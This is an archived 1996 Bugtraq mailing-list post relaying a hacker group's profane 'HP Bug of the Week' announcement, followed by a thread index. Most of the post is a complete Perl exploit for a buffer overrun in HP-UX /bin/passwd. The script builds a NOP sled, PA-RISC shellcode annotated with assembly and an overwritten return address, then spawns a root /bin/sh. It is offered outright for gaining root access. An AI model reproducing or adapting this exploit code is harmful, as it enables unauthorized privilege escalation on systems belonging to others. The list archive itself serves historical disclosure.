Bugtraq mailing list archives
HP Bug of the Week!
From: aleph1 () dfw net (Aleph One)
Date: Sat, 23 Nov 1996 08:19:34 -0600
From our SOD friends (http://command.com.inter.net/~sod/); Press D now if
you are easily offended: This week: If I had a life, I wouldn't spend my Friday nights giving you bugs Good fuckin' day, eh? Welcome to the HP Bug of the Week -- if you haven't come here looking for security holes to HP/UX computers, you've come to the wrong fucking place. Otherwise look no further because you've found the fuckin' mecca of the fuckin' desert. Our goal here is to distribute those HP bugeridoo's as far and wide as is fucking humanly possible, so tell a friend if you have one. We've got a root hole from a buffer overrun in /bin/passwd this week, plus a whole new section called "Other Folks Scripts" that rakes in the wonderful works of other net.scriptors. So come on in, look around, take all you want but eat all you take and as always, start clicking your way to root access with scripts from the motherfuckin' folks at SOD. Vulgarity rating: 6 (scalawag) Caveat Emptor passwd is broked script for this week #!/usr/bin/perl # SOD /bin/passwd buffer overrun use FileHandle; sub h2cs { local($stuff)=@_; local($rv); while($stuff !~ /^$/) { $bob=$stuff; $bob =~ s/^(..).*$/$1/; $stuff =~ s/^..//; $rv.=chr(oct("0x${bob}")); } return $rv; } open(PIPE,"uname -r|"); chop($rev=<PIPE>); close(PIPE); $rev =~ s/^.*\.(.*)\..*$/$1/; if ($rev eq "10") { $offset=2102; $prealign="AA"; # 2 byte pre $postalign=""; # 0 byte post $pcoq=h2cs("7b03b463"); } else { $offset=2170; # 2170 works for 9.X... $prealign=""; # zero byte pre $postalign="PP"; # 2 byte post $pcoq=h2cs("7b033018"); } $nop=h2cs("08210280"); $code=""; $code.=h2cs("34160506"); # LDI 643,r22 $code.=h2cs("96d60534"); # SUBI 666,r22,r22 $code.=h2cs("20200801"); # LDIL L%0xc0000004,r1 $code.=h2cs("e420e008"); # BLE 4(sr7,r1) $code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0 $code.=h2cs("e83f1ffd"); # BL .+8,r1 $code.=h2cs("08210280"); # NOP $code.=h2cs("34020102"); # LDI 129,rp $code.=h2cs("08410402"); # SUB r1,rp,rp $code.=h2cs("60400162"); # STB r0,177(rp) $code.=h2cs("b45a0154"); # ADDI 170,rp,arg0 $code.=h2cs("0b390299"); # XOR arg1,arg1,arg1 $code.=h2cs("0b180298"); # XOR arg2,arg2,arg2 $code.=h2cs("341604be"); # LDI 607,r22 $code.=h2cs("20200801"); # LDIL L%0xc0000004,r1 $code.=h2cs("e420e008"); # BLE 4(sr7,r1) $code.=h2cs("96d60534"); # SUB 666,r22,r22 $code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails $data="/bin/sh."; # Data stuff $codedata=$code.$data; $num=int(($offset-length($code)-length($data)-4)/4); $pre="$nop"x$num; $of=$prealign; $of.=$pre.$code.$data.$postalign.$pcoq; exec("/bin/passwd","$of"); Aleph One / aleph1 () dfw net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Current thread:
- Re: Security Problems in XMCD 2.1, (continued)
- Re: Security Problems in XMCD 2.1 Alan Cox (Nov 27)
- Administratriva Aleph One (Nov 26)
- A security issue of a different kind. Alan Brown (Nov 26)
- BOOTP/DHCP security itudps (Nov 26)
- Re: BOOTP/DHCP security Alan Cox (Nov 27)
- Re: A security issue of a different kind. Jon Peatfield (Nov 27)
- Re: A security issue of a different kind. Piete Brooks (Nov 27)
- Major Security Vulnerabilities in Remote CD Databases David J. Meltzer (Nov 26)
- Re: Major Security Vulnerabilities in Remote CD Databases itudps (Nov 26)
- lquerypv fix Troy Bollinger (Nov 25)
- HP Bug of the Week! Aleph One (Nov 23)
- HP Bug of the Week: OFS Aleph One (Nov 23)
- Serious BIND resolver problem. Oliver Friedrichs (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Alan Cox (Nov 19)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Joe Zbiciak (Nov 19)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Tim Newsham (Nov 20)